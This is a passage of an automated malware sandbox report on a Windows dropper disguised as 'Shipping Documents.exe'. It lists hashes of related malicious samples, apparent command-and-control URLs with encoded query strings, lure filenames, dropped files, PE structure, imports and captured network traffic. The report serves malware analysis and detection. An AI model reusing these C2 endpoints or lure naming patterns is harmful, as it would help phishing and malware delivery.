                                        • www.dreamlikeliving.com/uv34/?tXEd=9r4tEpsH-L5HP&2dspJx=5UaGcRQVNBURRiJV+9v1SQNlNBIBrH6pS93qQ4ZjH/IbytUWJvzWBvUcaruiRElFA3tJ
                                        1103305789.exeGet hashmaliciousBrowse
                                        • www.dreamlikeliving.com/uv34/?rZ=5UaGcRQVNBURRiJV+9v1SQNlNBIBrH6pS93qQ4ZjH/IbytUWJvzWBvUcaoChN0p9NWQfTlumPA==&sBvD8F=GxopsDgxOz1D0R
                                        ofert#U0103 comand#U0103 de cump#U0103rare_pdf.exeGet hashmaliciousBrowse
                                        • www.weirdkult.com/b3gc/?ndkHzH=-Z20XnRx36xD&ARn=fdxwzo3oR3+60ycRzpiGgZCohcHl+5WU1+HTjmZXhP2AlGDanZS5zFmFBLd5xguXKjuO
                                        zDUYXIqwi4.exeGet hashmaliciousBrowse
                                        • www.recovatek.com/hx3a/?YVMtavf=fCmUcBRhMrUy3w+kl11B/xiypSW2fUD8cU7Pu3gqArK5c3pJn3j9k/DsIYuCZjxFqiyLV4XQ2A==&EBZ=ZTIHdV4XjtnXb
                                        HbnmVuxDIc.exeGet hashmaliciousBrowse
                                        • www.manicolada.com/oerg/?xBZ4k4xH=VrJFN02EWUtV1rIt9g/j1QSdUuEw0Uf1/z3ywhG+Y3UeSqedxSn0wL7pECCF3FrbmHhMvfLpdA==&tHr8=gdfDsdw8
                                        Invoice.exeGet hashmaliciousBrowse
                                        • www.cjaccessories.net/eqas/?v4Xp-=zlzoH+ErGdORI3KgnipEDQmAM+5mnlewXlSz4LF6ZDcdx8uItHTjoqljxUMZx7tHvLXvbS3vgg==&0nGP-6=LhrLJ4-pzBedz
                                        OuuJQ2R6v5.exeGet hashmaliciousBrowse
                                        • www.trumpchix.com/g8bi/?7n=zq4LXs77W3q9n4caIdqAltHL4o48M8oiqlf9nZ5gHtwqOaWe9U5+XgrVJla/dPCaIiP2&lHK8=X2JX02PxcH_p0rM

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        shops.myshopify.comRemittance Advice pdf.exeGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        74ed218c_by_Libranalysis.exeGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        don.exeGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        WaybillDoc_7349796565.pdf.exeGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        a3aa510e_by_Libranalysis.exeGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        wMqdemYyHm.exeGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        PO#10244.exeGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        493bfe21_by_Libranalysis.exeGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        DocNo2300058329.exeGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        x16jmZMFrN.exeGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        TNT SHIPPING DOC 6753478364.exeGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        z5Wqivscwd.exeGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        DVO100024000.docGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        100005111.exeGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        1103305789.exeGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        New order.04272021.DOC.exeGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        ofert#U0103 comand#U0103 de cump#U0103rare_pdf.exeGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        zDUYXIqwi4.exeGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        HbnmVuxDIc.exeGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        Invoice.exeGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        ext-sq.squarespace.comwMqdemYyHm.exeGet hashmaliciousBrowse
                                        • 198.49.23.145
                                        d801e424_by_Libranalysis.docxGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        7824,pdf.exeGet hashmaliciousBrowse
                                        • 198.49.23.145
                                        PO_29_00412.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        DHL_S390201.exeGet hashmaliciousBrowse
                                        • 198.185.159.145
                                        triage_dropped_file.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        Wire transfer.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        mC9LnX9aGE.exeGet hashmaliciousBrowse
                                        • 198.49.23.145
                                        4x1cYP0PFs.exeGet hashmaliciousBrowse
                                        • 198.49.23.145
                                        SO.xlsm.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        RDAx9iDSEL.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        MrV6Do8tZr.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        50% payment.exeGet hashmaliciousBrowse
                                        • 198.185.159.145
                                        Bank Details.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        slystan.xlsm.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        Order PO #5544 TULIP GROUP LLC , PDF.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        oFTHxkeltz.rtfGet hashmaliciousBrowse
                                        • 198.185.159.145
                                        qmhFLhRoEc.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        uNttFPI36y.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        RE New order.exeGet hashmaliciousBrowse
                                        • 198.185.159.144

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        SQUARESPACEUSS4qfwZnR6X.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        wMqdemYyHm.exeGet hashmaliciousBrowse
                                        • 198.49.23.145
                                        d801e424_by_Libranalysis.docxGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        7824,pdf.exeGet hashmaliciousBrowse
                                        • 198.49.23.145
                                        PO_29_00412.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        DHL_S390201.exeGet hashmaliciousBrowse
                                        • 198.185.159.145
                                        triage_dropped_file.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        4x1cYP0PFs.exeGet hashmaliciousBrowse
                                        • 198.49.23.145
                                        SO.xlsm.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        RDAx9iDSEL.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        MrV6Do8tZr.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        50% payment.exeGet hashmaliciousBrowse
                                        • 198.185.159.145
                                        jH10jDMcBZ.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        Bank Details.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        slystan.xlsm.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        Order PO #5544 TULIP GROUP LLC , PDF.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        oFTHxkeltz.rtfGet hashmaliciousBrowse
                                        • 198.185.159.145
                                        qmhFLhRoEc.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        uNttFPI36y.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        RE New order.exeGet hashmaliciousBrowse
                                        • 198.185.159.144
                                        CLOUDFLARENETUSDocuments_111651917_375818984.xlsGet hashmaliciousBrowse
                                        • 104.21.64.132
                                        Documents_111651917_375818984.xlsGet hashmaliciousBrowse
                                        • 172.67.151.10
                                        813oo3jeWE.exeGet hashmaliciousBrowse
                                        • 104.23.98.190
                                        4GGwmv0AJm.exeGet hashmaliciousBrowse
                                        • 23.227.38.32
                                        c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                        • 104.26.13.9
                                        FzDN7GfLRo.exeGet hashmaliciousBrowse
                                        • 162.159.137.232
                                        Remittance Advice pdf.exeGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        Yeni sipari#U015f _WJO-001, pdf.exeGet hashmaliciousBrowse
                                        • 104.21.19.200
                                        Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                        • 172.67.151.10
                                        Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                        • 104.21.64.132
                                        5c542bb5_by_Libranalysis.exeGet hashmaliciousBrowse
                                        • 104.21.84.93
                                        6a9b0000.da.dllGet hashmaliciousBrowse
                                        • 104.20.184.68
                                        6ba90000.da.dllGet hashmaliciousBrowse
                                        • 104.20.184.68
                                        5c542bb5_by_Libranalysis.exeGet hashmaliciousBrowse
                                        • 104.21.84.93
                                        s.dllGet hashmaliciousBrowse
                                        • 104.20.185.68
                                        setup-lightshot.exeGet hashmaliciousBrowse
                                        • 104.23.139.12
                                        s.dllGet hashmaliciousBrowse
                                        • 104.20.185.68
                                        74ed218c_by_Libranalysis.exeGet hashmaliciousBrowse
                                        • 23.227.38.74
                                        Bank payment return x.exeGet hashmaliciousBrowse
                                        • 104.21.19.200
                                        471e3984_by_Libranalysis.docxGet hashmaliciousBrowse
                                        • 104.22.1.232

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Temp\6jozwj8vold4hca
                                        Process:C:\Users\user\Desktop\202139769574 Shipping Documents.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):6661
                                        Entropy (8bit):7.965733975411533
                                        Encrypted:false
                                        SSDEEP:192:G8dUYWCcT4LQA0xDqK8Y0XEmDaqw0TgnB:G0Z8A0xD1eECZw08B
                                        MD5:FA3FABB95EFE2421CB6CFE45AF090058
                                        SHA1:B640202E71BFA1A4491CB51CCA08C2CAEB261243
                                        SHA-256:5270B05F0892FA817E271BF75BDEC87F4E422BE60A5CC010C0779CAB5F9310AB
                                        SHA-512:E8883E6AF046CC3A3A764705B379350201C6E630529833355239B54125CDA78645FA2F32559D19D0EB384035A5A8107EA6EC1D7E23967CC7485A8E5AA2021D3B
                                        Malicious:false
                                        Reputation:low
                                        Preview: ....d;...$..7s5..w.M:.......]@....f..RtD.3.k..$C....../.0...~..N.9.\.B.G.a.x...).^_L.$..<.Qt#....'.$.....6.........M......`t...uow..].%....f..zl...oui..k.K.H6....,.T.U..[t.A\.o...e3..k~....H.b.T.....9!.../.......(...ZJ0.V.d..S..WaE.S.=..V.@<DP...-.-..5.?..7#M..Xq.3.'?...\.{..*........9.f.......2.o..-."R.;.$.8..IW.v...C.`dF.q...:.OU....1..n$o...4......!..O...........kiu..Wx..$..gQ... ..8K!.k..N8..iE..R..U..U...(T.p...lm.....z .M#.Fc.....>.g2....]pw.V.Of.oJ...i...o...^...!...JL...B....%i.y.a..5e.d)..lI..m.H.>..13K.D.q.E-p.+.m.......1x.2...0.pN>.8...P...8..v.&.)..E.K:\...'.N...."..}...p4.$~...L...bJ.M...T.V..zH.?. .%X..#.v. ...~...k=K.Hr2.R.O.Q.....*.gg~.}..'2.=3z ...~..#.=C..f.x.Z.....a.T}c...o.E.!._.U,"<..'....!.*........._...."2b.e,r..v....`..=..,>?.6jT......*....E..e...e..*[.0"- |.?........xM.vXZ.).@...:......LO...G.2....`..9.P.D..M.L.,c.*....u.t..}E..SO.. ....|`....N.p*1...iSk.5...,O...?..p..K..g1.H.x.#.|..~;W..W..\qa.."{.v.}.|.X/.I.i.
                                        C:\Users\user\AppData\Local\Temp\mjxrwbd3mn4
                                        Process:C:\Users\user\Desktop\202139769574 Shipping Documents.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):186368
                                        Entropy (8bit):7.9991063815094785
                                        Encrypted:true
                                        SSDEEP:3072:IyrTURCvk/yUkIzR58kBNxMoMxq+Yf3sgKqApifG2ke47if0/pmXIRvy:Nr6CM/yUkQX8SMoPf83Z0fG4qif0/pby
                                        MD5:563AC074A4ED1386DB6F9D39D07E27D8
                                        SHA1:86B4D17F259CE0AB4DDFAE1CC8AE71516BB6B02D
                                        SHA-256:2ACA38659931F371C14ACF2155E27B0F02C6D8DA853E9F3CA591B0E54A5D257B
                                        SHA-512:3CB98D18C7AA58152D74A895256356AB603931C1BECDD52653603D4EDC1F458EE5901C25524194FD6693090889E4BFDE6D66EC535AB1B1D4BFD4B9E9E98BCC02
                                        Malicious:false
                                        Reputation:low
                                        Preview: A.[.3..*.Q....{..sN...'<..ONeo..bLU...m ...7pl..6.BW.}.HX.K.0...._V...A..8..?.r....!....v..V.'.nY.z.T?..8..l.>o..aF.....4...h.i2.m3.j....<^..6.u...i.....:.....P.=..<*..K;S.....9.G.;3.9.d......F...#bW.O..;i.D.....Yq.}...G.D8...$NV.....RO.c....'...(.7.M.9|.......S.l<.d.w.$B...$a2..D0J$._O?....2O!.}.......U...4...9..2(.{Y1.=..v.#iK..V..O....,..K..k..../..)i.....1..y.."...t`sj......>.Q.%f3~.U.W...$..KsUT.....B.Q............V.....[.o]...l.Z...&....=.b(1.....XE.D....^...?rP..(.....jJ+. G%P/{.6..F.....T.;um%..zX~..........ZQ)..3W... ..;.....W.m.FZ.P.r.Wc.$..J....J..)u..N*..e..^.~od^.\h.;....N+.<2.<'..E.Y.....1....T..>k.:{..#.S{.$b_.....}..^zD.l.\9.O..x.rr..\8.s?3.-.-....ge.=......$....1......"#.9.Y..).L.U.N..]..C....{..N.....[...'!...B.bp.k...q.P. .0h...Q.d....%....Z.R?D.....Z(,...~.I.`......J...".....f+.bZ>,.-.........^.\...r&.....L.|N..%....4&V:..U.].eK..D-.vq.N%x')>(@..Y.......A.....X/.. .Y/.Y..*E...T.x.`.....j..pt.T....6..".1V...g..q.=.Y.
                                        C:\Users\user\AppData\Local\Temp\nseCE57.tmp
                                        Process:C:\Users\user\Desktop\202139769574 Shipping Documents.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):202809
                                        Entropy (8bit):7.951227965199436
                                        Encrypted:false
                                        SSDEEP:6144:ErIr6CM/yUkQX8SMoPf83Z0fG4qif0/pb:OIrs/yU/8SLn83afJdfepb
                                        MD5:EEC68D9A616CC886AE38B3F03FD9BF89
                                        SHA1:7CC6FEA48F92829BC72B6CB9C235D1342EBDC92C
                                        SHA-256:2269443BC541DD17909DA43985E6C73D332A4B89B8771F3A09276E16F0A449B5
                                        SHA-512:E4E79ACDBC1501412F894851E686C31D23B703164102D34938709F78D7590DC5A6063381F86714B695CBE4DF3CF43A4765ED6BCEEB6D36F233A8BA58207891AF
                                        Malicious:false
                                        Reputation:low
                                        Preview: $.......,...............................>.......$...........................................................................................................................................................................................................................................J...................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\nszCE87.tmp\22m80anrrsp.dll
                                        Process:C:\Users\user\Desktop\202139769574 Shipping Documents.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):6144
                                        Entropy (8bit):4.592177790604414
                                        Encrypted:false
                                        SSDEEP:96:rcgn1ASkfNDZ+t8oFmfRYB0tGL+l6gUVklwLz2ub29+3EQs:wnmlLa6gWCki99+3EQ
                                        MD5:A91A7F4F897A9E713B5773E389980197
                                        SHA1:7B8BF8B09702848EF1E3FB0CFD8FA94FBF92FFC3
                                        SHA-256:E74DA3284780511C44E53FC952A7DFE12578DDCB37C3BCFF43C1C45D5A427B0A
                                        SHA-512:883A8957A712B3A83C90555B19CB71BD49EAD9B8B042FF18515007B3A081208F7E1AF38D56BDC0610D5A7F8D7758FF1DC3A8264E20DCF2E294CF852BB604B9DF
                                        Malicious:false
                                        Reputation:low
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................C1...........;.....;.....;.....Rich...........PE..L...T..`...........!......................... ...............................@.......................................!..P...$#......................................0!..............................P!..@............ ...............................text...p........................... ..`.rdata....... ......................@..@.data...L....0......................@...........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Entropy (8bit):7.8990267345678715
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:202139769574 Shipping Documents.exe
                                        File size:235115
                                        MD5:eee5f618718bc8237bb9c7a48154cf1a
                                        SHA1:84dc873f65dc9e86978944d1adddb762efcf2631
                                        SHA256:cc7b066e0fa912d406c27790458ad6feb171b27275b6e3fe46b7a7574da7bfce
                                        SHA512:8f49fab9642c63814bc77ff302d05719d92404fe38bd220060a161c51b3f6f129bd5c4b2a4b3a2e1e239488e31f157f32b772505f8501003682cc9904d205c57
                                        SSDEEP:6144:lPXIfOtwEmM2jSvr02vaoMrgkoHYltLEZZLMZU7J:aW2Ar0Esrbo4H0MZ+
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L.....$_.................d..........a4............@

                                        File Icon

                                        Icon Hash:b2a88c96b2ca6a72

                                        Static PE Info

                                        General

                                        Entrypoint:0x403461
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x5F24D6E4 [Sat Aug 1 02:43:48 2020 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:ea4e67a31ace1a72683a99b80cf37830

                                        Entrypoint Preview

                                        Instruction
                                        sub esp, 00000184h
                                        push ebx
                                        push esi
                                        push edi
                                        xor ebx, ebx
                                        push 00008001h
                                        mov dword ptr [esp+18h], ebx
                                        mov dword ptr [esp+10h], 0040A130h
                                        mov dword ptr [esp+20h], ebx
                                        mov byte ptr [esp+14h], 00000020h
                                        call dword ptr [004080B0h]
                                        call dword ptr [004080C0h]
                                        and eax, BFFFFFFFh
                                        cmp ax, 00000006h
                                        mov dword ptr [0042474Ch], eax
                                        je 00007F291CB83933h
                                        push ebx
                                        call 00007F291CB86AAEh
                                        cmp eax, ebx
                                        je 00007F291CB83929h
                                        push 00000C00h
                                        call eax
                                        mov esi, 004082A0h
                                        push esi
                                        call 00007F291CB86A2Ah
                                        push esi
                                        call dword ptr [004080B8h]
                                        lea esi, dword ptr [esi+eax+01h]
                                        cmp byte ptr [esi], bl
                                        jne 00007F291CB8390Dh
                                        push 0000000Bh
                                        call 00007F291CB86A82h
                                        push 00000009h
                                        call 00007F291CB86A7Bh
                                        push 00000007h
                                        mov dword ptr [00424744h], eax
                                        call 00007F291CB86A6Fh
                                        cmp eax, ebx
                                        je 00007F291CB83931h
                                        push 0000001Eh
                                        call eax
                                        test eax, eax
                                        je 00007F291CB83929h
                                        or byte ptr [0042474Fh], 00000040h
                                        push ebp
                                        call dword ptr [00408038h]
                                        push ebx
                                        call dword ptr [00408288h]
                                        mov dword ptr [00424818h], eax
                                        push ebx
                                        lea eax, dword ptr [esp+38h]
                                        push 00000160h
                                        push eax
                                        push ebx
                                        push 0041FD10h
                                        call dword ptr [0040816Ch]
                                        push 0040A1ECh

                                        Rich Headers

                                        Programming Language:
                                        • [EXP] VC++ 6.0 SP5 build 8804

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x84380xa0.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000xbc8.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x623c0x6400False0.65859375data6.40257705324IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rdata0x80000x12740x1400False0.43359375data5.05749598324IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0xa0000x1a8580x600False0.445963541667data4.08975001509IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .rsrc0x2d0000xbc80xc00False0.435546875data4.46172201417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_ICON0x2d1c00x2e8dataEnglishUnited States
                                        RT_DIALOG0x2d4a80x144dataEnglishUnited States
                                        RT_DIALOG0x2d5f00x100dataEnglishUnited States
                                        RT_DIALOG0x2d6f00x11cdataEnglishUnited States
                                        RT_DIALOG0x2d8100x60dataEnglishUnited States
                                        RT_GROUP_ICON0x2d8700x14dataEnglishUnited States
                                        RT_MANIFEST0x2d8880x340XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                        Imports

                                        DLLImport
                                        ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                        SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                        ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                        COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                        USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                        GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                        KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, GetTempFileNameA, RemoveDirectoryA, WriteFile, CreateDirectoryA, GetLastError, CreateProcessA, GlobalLock, GlobalUnlock, CreateThread, lstrcpynA, SetErrorMode, GetDiskFreeSpaceA, lstrlenA, GetCommandLineA, GetVersion, GetWindowsDirectoryA, SetEnvironmentVariableA, GetTempPathA, CopyFileA, GetCurrentProcess, ExitProcess, GetModuleFileNameA, GetFileSize, ReadFile, GetTickCount, Sleep, CreateFileA, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        05/04/21-07:04:44.374290TCP1201ATTACK-RESPONSES 403 Forbidden804975423.227.38.74192.168.2.4

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        May 4, 2021 07:04:44.156946898 CEST4975480192.168.2.423.227.38.74
                                        May 4, 2021 07:04:44.200963020 CEST804975423.227.38.74192.168.2.4
                                        May 4, 2021 07:04:44.201138973 CEST4975480192.168.2.423.227.38.74
                                        May 4, 2021 07:04:44.201277971 CEST4975480192.168.2.423.227.38.74
                                        May 4, 2021 07:04:44.242088079 CEST804975423.227.38.74192.168.2.4
                                        May 4, 2021 07:04:44.374289989 CEST804975423.227.38.74192.168.2.4
                                        May 4, 2021 07:04:44.374347925 CEST804975423.227.38.74192.168.2.4
                                        May 4, 2021 07:04:44.374392033 CEST804975423.227.38.74192.168.2.4
                                        May 4, 2021 07:04:44.374419928 CEST804975423.227.38.74192.168.2.4
                                        May 4, 2021 07:04:44.374439001 CEST804975423.227.38.74192.168.2.4
                                        May 4, 2021 07:04:44.374450922 CEST804975423.227.38.74192.168.2.4
                                        May 4, 2021 07:04:44.374499083 CEST804975423.227.38.74192.168.2.4
                                        May 4, 2021 07:04:44.374547958 CEST4975480192.168.2.423.227.38.74
                                        May 4, 2021 07:04:44.374583960 CEST4975480192.168.2.423.227.38.74
                                        May 4, 2021 07:04:44.374627113 CEST4975480192.168.2.423.227.38.74
                                        May 4, 2021 07:04:44.374713898 CEST4975480192.168.2.423.227.38.74
                                        May 4, 2021 07:05:04.632004976 CEST4976880192.168.2.4198.185.159.144
                                        May 4, 2021 07:05:04.802618980 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:04.802793026 CEST4976880192.168.2.4198.185.159.144
                                        May 4, 2021 07:05:04.803034067 CEST4976880192.168.2.4198.185.159.144
                                        May 4, 2021 07:05:04.973489046 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:04.979024887 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:04.979042053 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:04.979053020 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:04.979098082 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:04.979115963 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:04.979126930 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:04.979140043 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:04.979151964 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:04.979167938 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:04.979185104 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:04.979249001 CEST4976880192.168.2.4198.185.159.144
                                        May 4, 2021 07:05:04.979291916 CEST4976880192.168.2.4198.185.159.144
                                        May 4, 2021 07:05:04.979320049 CEST4976880192.168.2.4198.185.159.144
                                        May 4, 2021 07:05:05.149884939 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:05.149898052 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:05.149910927 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:05.149943113 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:05.149954081 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:05.149971962 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:05.149986029 CEST4976880192.168.2.4198.185.159.144
                                        May 4, 2021 07:05:05.149990082 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:05.150005102 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:05.150032043 CEST4976880192.168.2.4198.185.159.144
                                        May 4, 2021 07:05:05.150060892 CEST4976880192.168.2.4198.185.159.144

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        May 4, 2021 07:03:04.079806089 CEST5372353192.168.2.48.8.8.8
                                        May 4, 2021 07:03:04.128549099 CEST53537238.8.8.8192.168.2.4
